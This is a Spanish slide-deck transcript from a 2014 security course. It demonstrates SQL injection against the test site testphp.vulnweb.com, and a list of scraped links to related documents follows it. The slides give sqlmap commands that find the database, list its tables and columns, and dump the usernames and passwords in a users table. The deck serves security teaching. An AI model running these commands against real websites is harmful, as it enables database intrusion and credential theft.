2. ataque por inyección de código sql a sitio web

9
Especialización en Seguridad Informática Ataque por inyección de código SQL a sitio Web JOSÉ ALFREDO RAMÍREZ PRADA Espinal, Septiembre de 2014

Transcript of 2. ataque por inyección de código sql a sitio web

Page 1: 2. ataque por inyección de código sql a sitio web

Especialización en

Seguridad Informática

Ataque por inyección de código SQL a

sitio Web

JOSÉ ALFREDO RAMÍREZ PRADA

Espinal, Septiembre de 2014

Page 2: 2. ataque por inyección de código sql a sitio web

Ataque a sitio Web http://testphp.vulnweb.com

Realizar un ataque a la base de datos del sitio

http://testphp.vulnweb.com, con lo cual se debe obtener toda la

información sobre la base de datos por ejemplo servidor de BD y

versión, nombre de la base de datos, nombre de las tablas, información

de las tablas, información de las columnas, etc.

Page 3: 2. ataque por inyección de código sql a sitio web

Se inicia el ataque en la pagina Web, por ejemplo se introduce una

comilla en el campo “Search” del formulario «Browse artists",

seguidamente en la direccion URL despues del signo igual se escribe

una comilla sencilla (´) y observamos un mensaje de error SQL.

Ataque a sitio Web http://testphp.vulnweb.com

Page 4: 2. ataque por inyección de código sql a sitio web

Identificada la vulnerabilidad, podemos atacar por medio de la consola

de comando de Windows, ubicados en el directorio C:\sqlmap

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db

Se confirma la vulnerabilidad y

sqlmap ha sido capaz de detectar

el motor de base de datos MySQL

5.0.11 y el servidor Web PHP

5.3.10, el nombre de la base de

datos ‘ACUART'.

Ataque a sitio Web http://testphp.vulnweb.com

Page 5: 2. ataque por inyección de código sql a sitio web

Seguidamente podemos identificar las tablas de la Base de Datos por medio del

comando:

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables

Ataque a sitio Web http://testphp.vulnweb.com

Page 6: 2. ataque por inyección de código sql a sitio web

una vez identificada la tabla (users) podremos identificar información de las

columnas, correspondientemente con los siguientes comandos:

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns

Ataque a sitio Web http://testphp.vulnweb.com

Page 7: 2. ataque por inyección de código sql a sitio web

una vez identificadas las columnas de la tabla procedemos a verificar la información

de los campos “uname, pass, name” de la tabla users,

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C uname --dump

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C pass --dump

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C name --dump

Ataque a sitio Web http://testphp.vulnweb.com

Page 8: 2. ataque por inyección de código sql a sitio web

De esta forma obtenemos toda la información de la base de datos del sitio Web.

Ataque a sitio Web http://testphp.vulnweb.com

Page 9: 2. ataque por inyección de código sql a sitio web

Especialización en

Seguridad Informática


Intrusión Web: Google Dorks e Inyección Sql³n_SQL_en_Páginas_Web.pdf · Google Dorks e Inyección Sql 20-Marzo-II Jornadas de Prevención del 2015 ... USER | PASSWORD. Ejemplos

Intrusión Web: Google Dorks e Inyección Sql³n_SQL_en_Páginas_Web.pdf · Google Dorks e Inyección Sql 20-Marzo-II Jornadas de Prevención del 2015 ... USER | PASSWORD. Ejemplos

Descargado de 1/26 · - En una primera fase, se realizó un ataque de inyección de SQL, mediante el cual el atacante pudo averiguar las claves de acceso de los usuarios a los servicios

Descargado de 1/26 · - En una primera fase, se realizó un ataque de inyección de SQL, mediante el cual el atacante pudo averiguar las claves de acceso de los usuarios a los servicios

Ataques a BB. DD., SQL Injection - Exaforo.com: … · vulnerabilidad de inyección de comandos SQL son los siguientes: ... Utilizados en métodos de llamadas POST – Campos de llamada

Ataques a BB. DD., SQL Injection - Exaforo.com: … · vulnerabilidad de inyección de comandos SQL son los siguientes: ... Utilizados en métodos de llamadas POST – Campos de llamada

Inyección Electrónica - 1 de Mecanica del... · Inyección Electrónica - 1 - Inyección Electrónica - 2 - Inyección Electrónica - 3 - Inyección Electrónica - 4 - Inyección

Inyección Electrónica - 1 de Mecanica del... · Inyección Electrónica - 1 - Inyección Electrónica - 2 - Inyección Electrónica - 3 - Inyección Electrónica - 4 - Inyección

Fundamentos de Transact-SQL (T-SQL)

Fundamentos de Transact-SQL (T-SQL)

TEMA-1 - Rincón de Esperanza | Este sitio va de … · ... Amenazas físicas y amenazas lógicas ... Inyección SQL es una vulnerabilidad informática en el ... Las soluciones más

TEMA-1 - Rincón de Esperanza | Este sitio va de … · ... Amenazas físicas y amenazas lógicas ... Inyección SQL es una vulnerabilidad informática en el ... Las soluciones más

Intrusión Web: Google Dorks e Inyección Sql

Intrusión Web: Google Dorks e Inyección Sql

UNIVERSIDAD DE SAN MARTÍN DE PORRESrepositorio.utp.edu.pe/bitstream/UTP/2078/1/Juan Romero...- Recomendaciones de herramientas para testing de portales web contra ataque de inyección.

UNIVERSIDAD DE SAN MARTÍN DE PORRESrepositorio.utp.edu.pe/bitstream/UTP/2078/1/Juan Romero...- Recomendaciones de herramientas para testing de portales web contra ataque de inyección.

Inyección de código SQL en MS SQL Server 2005 · código SQL pero centrándose en el motor de bases de datos, MS SQL Server 2005. Se va a obviar si la inyección de código se encuentra

Inyección de código SQL en MS SQL Server 2005 · código SQL pero centrándose en el motor de bases de datos, MS SQL Server 2005. Se va a obviar si la inyección de código se encuentra

Administrar SQL Server y Lenguaje SQL

Administrar SQL Server y Lenguaje SQL

Vistas En Sql Y My Sql

Vistas En Sql Y My Sql

Introducción ¿Por qué Inyección SQL? Definición. Objetivos. Concepto clave. Evaluación de riesgos. Ejemplos sencillos. Prueba en vivo Breve descripción.

Introducción ¿Por qué Inyección SQL? Definición. Objetivos. Concepto clave. Evaluación de riesgos. Ejemplos sencillos. Prueba en vivo Breve descripción.

Vento. - Volkswagen México · Alimentación de combustible Inyección electrónica multipunto Inyección electrónica multipunto Inyección electrónica multipunto Inyección electrónica

Vento. - Volkswagen México · Alimentación de combustible Inyección electrónica multipunto Inyección electrónica multipunto Inyección electrónica multipunto Inyección electrónica

ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB

ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB

sql y no sql

sql y no sql

Ataque por inyección de código sql

Ataque por inyección de código sql

SQL PROFESOR ISAAC GARCÍA RÍOS. Introducción a SQL ¿Qué significa SQL? ¿Qué es el SQL?

SQL PROFESOR ISAAC GARCÍA RÍOS. Introducción a SQL ¿Qué significa SQL? ¿Qué es el SQL?

Análisis de los Sistemas de Ataque y Protección en …repositorio.espe.edu.ec/bitstream/21000/8435/1/AC... · clave, bajo mecanismos de inyección se llega adivinar la clave, IV

Análisis de los Sistemas de Ataque y Protección en …repositorio.espe.edu.ec/bitstream/21000/8435/1/AC... · clave, bajo mecanismos de inyección se llega adivinar la clave, IV

No sql not only sql

No sql not only sql

Inyección de SQL

Inyección de SQL